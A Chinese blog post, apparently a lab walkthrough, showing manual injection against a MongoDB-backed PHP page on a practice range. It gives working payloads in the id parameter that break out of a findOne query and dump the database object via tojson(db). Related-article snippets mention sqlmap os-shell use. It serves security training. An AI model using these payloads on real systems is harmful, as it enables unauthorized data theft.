SQL手工注入MongoDB数据库

最新推荐文章于 2024-04-18 19:48:50 发布
最新推荐文章于 2024-04-18 19:48:50 发布
阅读量2k 收藏 2
点赞数
文章标签: mongodb 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35258863/article/details/122735071
版权

MongoDB语法跟其它数据库有所区别
具体参考:https://www.runoob.com/mongodb/mongodb-query.html

环境

墨者靶场 SQL手工注入漏洞测试(MongoDB数据库)

image-20220124230203923

思路

题目代码给出了列名

如果语句这样写/new_list.php?id=1 order by 2

代码接收db.notice.findOne({‘id’:‘1 order by 2’}); return data; 并没有闭合,注入语句无法生效

想办法闭合语句,查看所有集合

image-20220124224027039

注入语句

都是内置函数,注入语句改列名就行

构造简单的链接测回显:/new_list.php?id=1’}); return ({title:1,content:'2

image-20220124224431259

爆库: /new_list.php?id=1’}); return ({title:tojson(db),content:'1

最低0.47元/天 解锁文章
小千超人
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简述MongoDB数据库
LingXi566的博客
01-26 398
一、 MongoDB简介 MongoDB是一个面向文档的数据库系统。使用C++编写,不支持SQL,但有自己功能强大的查询语法。 MongoDB使用BSON作为数据存储和传输的格式。BSON是一种类似JSON的二进制序列化文档,支持嵌套对象和数组。 MongoDB很像MySQL,document对应MySQL的row,collection对应MySQL的table。 二、 Windows下MongoDB操作 MongoDB在Windows上的安装运行很方便。直接下载、解压,然后运行bin/mongod 即可启
day26WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等
m0_69583059的博客
01-16 1259
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器的过程。它配备了强大的检测引擎、用于终极渗透测试仪的许多利基功能以及从数据库指纹识别、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令的各种切换。
MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
T1ngSh0w的博客
09-05 1462
MongoDB数据库注入-墨者学院-SQL手工注入漏洞测试(MongoDB数据库)详细讲解
万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透!
2401_84010804的博客
04-18 1073
机会是留给有准备的人,大家在求职之前应该要明确自己的态度,熟悉求职流程,做好充分的准备,把一些可预见的事情做好。对于应届毕业生来说,校招更适合你们,因为绝大部分都不会有工作经验,企业也不会有工作经验的需求。同时,你也不需要伪造高大上的实战经验,以此让自己的简历能够脱颖而出,反倒会让面试官有所怀疑。你在大学时期应该明确自己的发展方向,如果你在大一就确定你以后想成为Java工程师,那就不要花太多的时间去学习其他的技术语言,高数之类的,不如好好想着如何夯实Java基础。请转发本文支持一下。
15、SQL注入之Oracel、MongoDB注入
山兔的博客
06-21 1390
不同的数据库,它获取信息的注入语句是有点不一样的,如果你不知道这个网站使用的是什么类型的数据库,就一个劲的用mysql注入语句去获取信息,那是无法获取到的,所以我们在判断出注入点的时候,你也得知道这个网站它使用的数据库是什么类型的,这样你才能够根据相关数据库注入语句去获取信息。mongodb它的条件,它的值,在提交数据库注入查询的时候,它是列表形式查询的,键值键名提交进去的,所以我们在注入的时候要考虑到我们的语句是要写到列表里面去,要注入的话,要闭合前面后面的列表,其实就是有符号干扰我们。
sql漏洞注入,Oracle,MongoDB注入(15)
san3144393495的博客
04-22 389
这一对比就发现access数据比其他数据库要低一个等级,在搭建网站的时候access网站,数据会保存到网站源码下面,就在他网站源码下面,换一个网站也是access,他们是互不相干的没有关系,像我们之前提到过跨库注入,mysql下面就可能存在数据a,数据库b,就可以通过数据a获取到数据库b信息,access就没有,因为他的数据库是独立村存在的,每一个网站就是自己的,不和其它网站相关,没有任何关系。之后再猜,猜不出来了,就只能用工具去跑出来,列名实在不知道,跑出来是passwd。
Mongodb注入
acepanhuan的博客
02-13 1145
Mongodb注入
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
mongodb 数据库基本操作.doc
最新发布
04-25
mongodb 数据库基本操作 MongoDB数据库的基本操作涉及多个方面,包括连接数据库、创建数据库、插入数据、查询数据、更新数据和删除数据等。以下是一些基本操作的简要说明: 连接MongoDB数据库: 使用MongoDB的...
在Mac上安装MongoDB数据库
02-22
在Mac上安装MongoDB数据库是一项常见的任务,尤其对于开发者来说,MongoDB是一个广泛使用的NoSQL数据库,适合处理非结构化和半结构化的数据。本文将详细介绍如何在MacOS上安装MongoDB,配置环境变量,设置数据和日志...
老生常谈MongoDB数据库基础操作
09-09
3. **无表结构限制**:与SQL数据库不同,MongoDB不需预定义表结构,这意味着在使用集合前不需要初始化,对于快速开发和应对多变的业务需求十分有利。 4. **索引支持**:MongoDB提供全面的索引支持,包括单键索引、...
MongoDB数据库应用.docx
09-05
MongoDB 数据库是一种面向文档的数据库系统,使用 C++ 编写,不支持 SQL,但有自己功能强大的查询语法。MongoDB 使用 BSON 作为数据存储和传输的格式。BSON 是一种类似 JSON 的二进制序列化文档,支持嵌套对象和数...
第15天:WEB漏洞-SQL注入之Oracle、mongoDB注入
cailme的博客
05-07 359
渗透测试day15
MONGODB 的基础 NOSQL注入基础
m0_64180167的博客
11-22 1530
首先来学习一下nosql这里安装就不进行介绍 只记录一下让自己了解mongodb
小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2 等
weixin_73760178的博客
02-18 1216
通过sqlmap找到管理员账号和密码,从而登入后台,再利用后台进行os-shell的连接实现shell交互,此时通过shell交互便可获取到对方服务器的IP等敏感信息,同时,在自己的服务器中开启监听,利用高级权限读写文件,向对服务器写入payload(.exe)并运行,实现上线服务器,然后在监听过程中开启msf,从而提权。猜回显位:用的是单引号,进行猜测,因为在数据库中加入单引号是一种字符类型的,通过SQL语句,判断之后的数据是否能正常的显示页面,从而进行判断注入点。测回显:/new_list.php?
SQL手工注入漏洞测试-MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
rumil的博客
08-15 245
SQL注入手工测试: MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
SQL注入(三)Oracle、Mongodb注入
m0_63917373的博客
10-04 587
Oracle、Mongodb注入 墨者
什么是 MongoDB,为什么它是当今最受欢迎的数据库之一?
努力是为了站在万人之中,成为别人的光
07-29 4128
什么是MongoDBMongoDB 是一个面向文档的 NoSQL 数据库,用于存储大量数据。MongoDB 使用集合和文档,而不是传统关系数据库中的表和行。MongoDB 是一个最早出现在 2000 年代中期的数据库。 NoSQL 数据库是传统 SQL 数据库的替代品,它几乎包含 RDBMS(关系数据库管理系统)系统中的所有功能。由于其简单的架构、对水平和垂直可扩展性的支持以及对数据的简单控制,NoSQL 数据库近年来比过去更加流行。 它允许程序员根据其程序的实际需求将数据存储在数据库中。我们无法通过.
spark sql 处理mongodb 数据库中的数据
03-16
Spark SQL可以通过MongoDB Connector for Spark来处理MongoDB数据库中的数据。具体步骤如下: 1. 在Spark应用程序中添加MongoDB Connector for Spark的依赖。 2. 创建SparkSession对象,并使用MongoDB Connector ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值